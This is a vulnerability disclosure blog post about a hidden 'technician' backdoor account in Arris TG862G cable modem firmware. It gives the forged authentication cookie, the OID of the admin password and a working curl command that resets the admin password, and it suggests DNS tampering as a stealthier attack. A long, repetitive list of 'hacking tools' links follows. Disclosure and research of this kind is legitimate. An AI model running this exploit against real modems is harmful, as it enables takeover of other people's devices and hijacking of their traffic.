Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

Related posts

1. Pentest Tools For Ubuntu
2. Pentest Tools Url Fuzzer
3. Hacker Security Tools
4. Pentest Tools Tcp Port Scanner
5. Hack Tools Github
6. Free Pentest Tools For Windows
7. Hacker Security Tools
8. Pentest Recon Tools
9. Hack Tools For Mac
10. How To Make Hacking Tools
11. Nsa Hacker Tools
12. Hacking Tools And Software
13. Hacker Tools Windows
14. Hack Tools For Games
15. Pentest Tools Kali Linux
16. Pentest Tools Port Scanner
17. Best Pentesting Tools 2018
18. Best Hacking Tools 2020
19. Hacker Tools Software
20. Blackhat Hacker Tools
21. Hacker Tools 2020
22. World No 1 Hacker Software
23. Hacking Tools For Kali Linux
24. Hacking Tools Free Download
25. Hacker Tools Free Download
26. Hacks And Tools
27. Bluetooth Hacking Tools Kali
28. Hacking Tools Software
29. Nsa Hack Tools Download
30. Hack Tools
31. Hacking Tools Windows
32. Pentest Tools List
33. Hacker Tools Linux
34. Hacking Tools For Mac
35. Hacker Tools For Pc
36. Best Pentesting Tools 2018
37. Kik Hack Tools
38. Hack Tools Online
39. Black Hat Hacker Tools
40. Nsa Hack Tools Download
41. Beginner Hacker Tools
42. Pentest Tools Website
43. Usb Pentest Tools
44. Hacks And Tools
45. How To Install Pentest Tools In Ubuntu
46. Hacking Tools For Windows
47. Blackhat Hacker Tools
48. Hacker Tools Github
49. Hack Tools Online
50. Pentest Tools
51. Hacking Tools Software
52. Hacker Hardware Tools
53. Pentest Automation Tools
54. Hacking Tools Windows
55. World No 1 Hacker Software
56. Hacking Tools Github
57. Hackers Toolbox
58. Pentest Tools
59. Hacking Tools Mac
60. Hack Tools For Ubuntu
61. Hacks And Tools
62. Hacking Tools For Windows
63. World No 1 Hacker Software
64. Tools For Hacker
65. Hack Tools For Games
66. Pentest Tools Windows
67. Hack Tools For Ubuntu
68. Hacking Tools Free Download
69. Pentest Tools Kali Linux
70. Hacker Tools For Ios
71. Hack Tools For Ubuntu
72. How To Hack
73. Hacker Techniques Tools And Incident Handling
74. Pentest Tools Windows
75. Pentest Tools
76. Hacker Tools 2020
77. Hack Tools Download
78. Hacker Tools Linux
79. Hacking Tools Windows 10
80. Pentest Tools Android
81. Hacking Tools For Windows Free Download
82. Hack Tools Pc
83. Hacking Tools Online
84. Hacking Tools Name
85. Pentest Reporting Tools
86. Hacking Tools For Mac
87. Hack Tools For Mac
88. Hacker Search Tools
89. Usb Pentest Tools
90. Pentest Tools Framework
91. Hacker Tools Hardware
92. Pentest Reporting Tools
93. Install Pentest Tools Ubuntu
94. How To Hack
95. Hack Tool Apk No Root
96. Pentest Tools Windows
97. Black Hat Hacker Tools
98. Hacking Tools For Mac
99. Top Pentest Tools
100. Pentest Tools Nmap
101. Black Hat Hacker Tools
102. Hacker Tools For Windows
103. Pentest Tools For Android
104. Hack Website Online Tool
105. Pentest Tools Website
106. Beginner Hacker Tools
107. Tools 4 Hack
108. Hacking Tools And Software
109. Hacks And Tools
110. Pentest Tools Github
111. Hacking Tools For Kali Linux
112. Hacking Apps
113. Hacking Tools Software
114. Hacking Tools
115. Hacker Tools Windows
116. Hacking Tools Windows
117. Hacker Search Tools
118. Hacking Tools For Games
119. Pentest Tools Bluekeep
120. Pentest Tools Apk
121. Usb Pentest Tools
122. Nsa Hacker Tools
123. Pentest Tools Apk
124. Hacker
125. Pentest Tools Kali Linux
126. What Is Hacking Tools
127. Computer Hacker
128. Hacking Tools For Windows
129. Game Hacking
130. Pentest Tools Alternative
131. What Is Hacking Tools
132. Game Hacking
133. Hacking Tools Windows
134. Physical Pentest Tools
135. Hacking Tools And Software
136. Pentest Tools Online
137. Hacker Tool Kit
138. New Hack Tools
139. Hacking Tools For Pc
140. Hacking Tools For Windows 7
141. Hack Tools Download
142. Hack Tools For Windows
143. Pentest Tools Download
144. Pentest Tools Review
145. Hacker Tool Kit
146. Hacking Tools For Beginners
147. Hack Tools For Pc
148. Pentest Tools List
149. Pentest Tools Nmap
150. Hacking Tools For Pc
151. Hack Tools For Pc
152. Hack Tool Apk No Root
153. Hacking Tools Name
154. Game Hacking
155. Pentest Tools List
156. Pentest Tools Find Subdomains
157. Hack Tool Apk
158. Top Pentest Tools
159. Hacker Tools For Pc
160. Hack Apps
161. Pentest Tools Android
162. Hacker Tools Github
163. Bluetooth Hacking Tools Kali
164. Pentest Tools For Ubuntu
165. Nsa Hack Tools
166. Wifi Hacker Tools For Windows
167. Hacking Tools 2019
168. Pentest Tools For Mac
169. Game Hacking
170. Pentest Tools Url Fuzzer
171. Hacking Tools Windows 10
172. Hacker Hardware Tools
173. Pentest Tools Alternative
174. Pentest Tools Online
175. What Is Hacking Tools
176. Hacking Tools Software
177. Pentest Reporting Tools